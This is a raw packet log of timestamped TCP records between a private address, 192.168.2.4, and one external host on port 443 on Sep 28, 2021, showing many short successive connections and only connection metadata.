Sep 28, 2021 07:59:47.818453074 CEST	443	50131	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:47.818618059 CEST	50131	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:47.885579109 CEST	50131	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:47.888005972 CEST	50132	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:47.888052940 CEST	443	50132	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:47.888187885 CEST	50132	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:47.889323950 CEST	50132	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:47.889349937 CEST	443	50132	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:47.950015068 CEST	443	50132	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:47.953937054 CEST	50132	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:47.953972101 CEST	443	50132	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:47.954113960 CEST	50132	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:47.954119921 CEST	443	50132	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:48.066093922 CEST	443	50132	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:48.066168070 CEST	443	50132	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:48.066237926 CEST	50132	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:48.067483902 CEST	50132	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:48.069026947 CEST	50133	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:48.069092035 CEST	443	50133	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:48.069245100 CEST	50133	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:48.069684029 CEST	50133	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:48.069703102 CEST	443	50133	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:48.126657009 CEST	443	50133	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:48.129904985 CEST	50133	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:48.129960060 CEST	443	50133	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:48.130150080 CEST	50133	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:48.130160093 CEST	443	50133	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:48.216171026 CEST	443	50133	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:48.216242075 CEST	443	50133	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:48.216286898 CEST	50133	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:48.217149019 CEST	50133	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:48.218468904 CEST	50134	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:48.218517065 CEST	443	50134	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:48.218605995 CEST	50134	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:48.219110966 CEST	50134	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:48.219137907 CEST	443	50134	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:48.274636984 CEST	443	50134	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:48.277525902 CEST	50134	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:48.277559996 CEST	443	50134	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:48.277650118 CEST	50134	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:48.277661085 CEST	443	50134	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:48.380570889 CEST	443	50134	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:48.380645037 CEST	443	50134	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:48.380707026 CEST	50134	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:48.381736040 CEST	50134	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:48.384537935 CEST	50135	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:48.384572029 CEST	443	50135	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:48.384655952 CEST	50135	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:48.385340929 CEST	50135	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:48.385355949 CEST	443	50135	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:48.440885067 CEST	443	50135	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:48.444093943 CEST	50135	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:48.444118023 CEST	443	50135	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:48.444195986 CEST	50135	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:48.444205046 CEST	443	50135	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:48.551448107 CEST	443	50135	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:48.551536083 CEST	443	50135	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:48.551599979 CEST	50135	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:48.552890062 CEST	50135	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:48.555577040 CEST	50136	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:48.555617094 CEST	443	50136	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:48.555707932 CEST	50136	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:48.556333065 CEST	50136	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:48.556345940 CEST	443	50136	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:48.614128113 CEST	443	50136	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:48.618989944 CEST	50136	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:48.619030952 CEST	443	50136	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:48.619167089 CEST	50136	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:48.619180918 CEST	443	50136	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:48.719980955 CEST	443	50136	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:48.720057964 CEST	443	50136	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:48.720118046 CEST	50136	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:48.721142054 CEST	50136	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:48.723046064 CEST	50137	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:48.723088980 CEST	443	50137	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:48.723169088 CEST	50137	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:48.723683119 CEST	50137	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:48.723697901 CEST	443	50137	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:48.781769991 CEST	443	50137	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:48.784953117 CEST	50137	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:48.784980059 CEST	443	50137	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:48.785104036 CEST	50137	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:48.785113096 CEST	443	50137	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:48.890080929 CEST	443	50137	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:48.890155077 CEST	443	50137	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:48.890266895 CEST	50137	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:48.891081095 CEST	50137	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:48.892429113 CEST	50138	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:48.892460108 CEST	443	50138	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:48.893205881 CEST	50138	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:48.893579960 CEST	50138	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:48.893589020 CEST	443	50138	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:48.951141119 CEST	443	50138	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:48.954758883 CEST	50138	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:48.954799891 CEST	443	50138	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:48.958838940 CEST	50138	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:48.958862066 CEST	443	50138	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:49.067753077 CEST	443	50138	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:49.067826986 CEST	443	50138	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:49.067915916 CEST	50138	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:49.069310904 CEST	50138	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:49.072032928 CEST	50139	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:49.072071075 CEST	443	50139	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:49.073759079 CEST	50139	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:49.074412107 CEST	50139	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:49.074424982 CEST	443	50139	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:49.130762100 CEST	443	50139	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:49.135984898 CEST	50139	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:49.136030912 CEST	443	50139	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:49.136284113 CEST	50139	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:49.136293888 CEST	443	50139	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:49.232542038 CEST	443	50139	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:49.232671976 CEST	443	50139	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:49.233284950 CEST	50139	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:49.233814001 CEST	50139	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:49.235624075 CEST	50140	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:49.235675097 CEST	443	50140	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:49.235980034 CEST	50140	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:49.236351013 CEST	50140	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:49.236371994 CEST	443	50140	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:49.292690039 CEST	443	50140	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:49.295372009 CEST	50140	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:49.295406103 CEST	443	50140	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:49.295506001 CEST	50140	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:49.295516014 CEST	443	50140	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:49.394303083 CEST	443	50140	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:49.394383907 CEST	443	50140	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:49.394877911 CEST	50140	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:49.395620108 CEST	50140	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:49.397018909 CEST	50141	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:49.397067070 CEST	443	50141	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:49.397172928 CEST	50141	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:49.397547007 CEST	50141	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:49.397562027 CEST	443	50141	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:49.456478119 CEST	443	50141	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:49.460516930 CEST	50141	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:49.460551977 CEST	443	50141	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:49.460858107 CEST	50141	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:49.460866928 CEST	443	50141	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:49.567831039 CEST	443	50141	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:49.567918062 CEST	443	50141	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:49.568052053 CEST	50141	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:49.569075108 CEST	50141	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:49.571336985 CEST	50142	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:49.571372986 CEST	443	50142	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:49.571465015 CEST	50142	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:49.571978092 CEST	50142	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:49.571995020 CEST	443	50142	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:49.627985001 CEST	443	50142	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:49.631633043 CEST	50142	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:49.631654978 CEST	443	50142	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:49.631814957 CEST	50142	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:49.631820917 CEST	443	50142	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:49.741064072 CEST	443	50142	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:49.741142035 CEST	443	50142	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:49.741753101 CEST	50142	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:49.742424965 CEST	50142	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:49.744474888 CEST	50143	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:49.744508028 CEST	443	50143	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:49.744616985 CEST	50143	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:49.745127916 CEST	50143	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:49.745148897 CEST	443	50143	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:49.803375959 CEST	443	50143	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:49.807605028 CEST	50143	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:49.807627916 CEST	443	50143	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:49.807763100 CEST	50143	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:49.807769060 CEST	443	50143	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:49.875972033 CEST	443	50143	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:49.876049995 CEST	443	50143	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:49.876117945 CEST	50143	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:49.877305031 CEST	50143	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:49.880101919 CEST	50144	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:49.880135059 CEST	443	50144	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:49.880237103 CEST	50144	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:49.880763054 CEST	50144	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:49.880776882 CEST	443	50144	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:49.938854933 CEST	443	50144	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:49.942311049 CEST	50144	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:49.942338943 CEST	443	50144	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:49.942478895 CEST	50144	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:49.942486048 CEST	443	50144	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:50.012320995 CEST	443	50144	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:50.012401104 CEST	443	50144	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:50.012479067 CEST	50144	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:50.013346910 CEST	50144	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:50.016048908 CEST	50145	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:50.016093969 CEST	443	50145	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:50.016212940 CEST	50145	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:50.016933918 CEST	50145	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:50.016954899 CEST	443	50145	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:50.072774887 CEST	443	50145	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:50.075685978 CEST	50145	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:50.075750113 CEST	443	50145	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:50.075825930 CEST	50145	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:50.075848103 CEST	443	50145	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:50.142487049 CEST	443	50145	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:50.142561913 CEST	443	50145	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:50.142618895 CEST	50145	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:50.143722057 CEST	50145	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:50.146823883 CEST	50146	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:50.146863937 CEST	443	50146	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:50.146953106 CEST	50146	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:50.147521973 CEST	50146	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:50.147552967 CEST	443	50146	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:50.205773115 CEST	443	50146	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:50.212579012 CEST	50146	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:50.212615013 CEST	443	50146	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:50.212991953 CEST	50146	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:50.213006020 CEST	443	50146	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:50.358812094 CEST	443	50146	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:50.358895063 CEST	443	50146	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:50.358989000 CEST	50146	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:50.360204935 CEST	50146	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:50.363073111 CEST	50147	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:50.363111019 CEST	443	50147	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:50.363205910 CEST	50147	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:50.363740921 CEST	50147	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:50.363750935 CEST	443	50147	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:50.423567057 CEST	443	50147	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:50.427614927 CEST	50147	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:50.427644968 CEST	443	50147	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:50.427791119 CEST	50147	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:50.427795887 CEST	443	50147	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:50.502053022 CEST	443	50147	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:50.502142906 CEST	443	50147	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:50.502238989 CEST	50147	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:50.503432035 CEST	50147	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:50.506138086 CEST	50148	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:50.506201029 CEST	443	50148	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:50.506382942 CEST	50148	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:50.507051945 CEST	50148	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:50.507077932 CEST	443	50148	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:50.563553095 CEST	443	50148	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:50.567421913 CEST	50148	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:50.567465067 CEST	443	50148	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:50.567715883 CEST	50148	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:50.567724943 CEST	443	50148	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:50.641170979 CEST	443	50148	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:50.641267061 CEST	443	50148	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:50.641349077 CEST	50148	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:50.642241955 CEST	50148	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:50.644131899 CEST	50149	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:50.644186020 CEST	443	50149	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:50.644292116 CEST	50149	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:50.644692898 CEST	50149	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:50.644707918 CEST	443	50149	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:50.700767994 CEST	443	50149	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:50.704735041 CEST	50149	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:50.704765081 CEST	443	50149	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:50.704863071 CEST	50149	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:50.704870939 CEST	443	50149	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:50.794217110 CEST	443	50149	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:50.794316053 CEST	443	50149	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:50.794389963 CEST	50149	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:50.796346903 CEST	50149	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:50.801125050 CEST	50150	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:50.801168919 CEST	443	50150	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:50.801387072 CEST	50150	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:50.802804947 CEST	50150	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:50.802825928 CEST	443	50150	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:50.860964060 CEST	443	50150	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:50.864145994 CEST	50150	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:50.864187956 CEST	443	50150	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:50.864289045 CEST	50150	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:50.864309072 CEST	443	50150	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:50.946024895 CEST	443	50150	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:50.946101904 CEST	443	50150	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:50.946168900 CEST	50150	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:50.947341919 CEST	50150	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:50.949969053 CEST	50151	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:50.950020075 CEST	443	50151	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:50.950109959 CEST	50151	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:50.950845003 CEST	50151	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:50.950865030 CEST	443	50151	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:51.009001970 CEST	443	50151	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:51.012213945 CEST	50151	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:51.012254000 CEST	443	50151	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:51.012347937 CEST	50151	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:51.012361050 CEST	443	50151	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:59.161200047 CEST	443	50151	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:59.161288023 CEST	443	50151	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:59.161452055 CEST	50151	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:59.162781954 CEST	50151	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:59.165991068 CEST	50152	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:59.166049957 CEST	443	50152	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:59.166174889 CEST	50152	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:59.166909933 CEST	50152	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:59.166934967 CEST	443	50152	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:59.223469019 CEST	443	50152	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:59.227014065 CEST	50152	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:59.227057934 CEST	443	50152	149.154.167.220	192.168.2.4
Sep 28, 2021 07:59:59.227170944 CEST	50152	443	192.168.2.4	149.154.167.220
Sep 28, 2021 07:59:59.227241993 CEST	443	50152	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:02.311958075 CEST	443	50152	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:02.312047005 CEST	443	50152	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:02.312117100 CEST	50152	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:02.312436104 CEST	50152	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:02.313141108 CEST	50153	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:02.313177109 CEST	443	50153	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:02.313349009 CEST	50153	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:02.313581944 CEST	50153	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:02.313595057 CEST	443	50153	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:02.370484114 CEST	443	50153	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:02.372363091 CEST	50153	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:02.372385025 CEST	443	50153	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:02.374958992 CEST	50153	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:02.374995947 CEST	443	50153	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:02.587744951 CEST	443	50153	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:02.587874889 CEST	443	50153	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:02.587965012 CEST	50153	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:02.588759899 CEST	50153	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:02.588826895 CEST	50154	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:02.588866949 CEST	443	50154	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:02.588968992 CEST	50154	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:02.589231968 CEST	50154	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:02.589267969 CEST	443	50154	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:02.646280050 CEST	443	50154	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:02.649296999 CEST	50154	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:02.649338007 CEST	443	50154	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:02.649699926 CEST	50154	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:02.649714947 CEST	443	50154	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:02.755930901 CEST	443	50154	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:02.756028891 CEST	443	50154	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:02.758793116 CEST	50154	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:02.759131908 CEST	50154	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:02.759717941 CEST	50155	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:02.759752989 CEST	443	50155	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:02.759848118 CEST	50155	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:02.760067940 CEST	50155	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:02.760082006 CEST	443	50155	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:02.817151070 CEST	443	50155	149.154.167.220	192.168.2.4
Sep 28, 2021 08:00:02.819808960 CEST	50155	443	192.168.2.4	149.154.167.220
Sep 28, 2021 08:00:02.819838047 CEST	443	50155	149.154.167.220	192.168.2.4
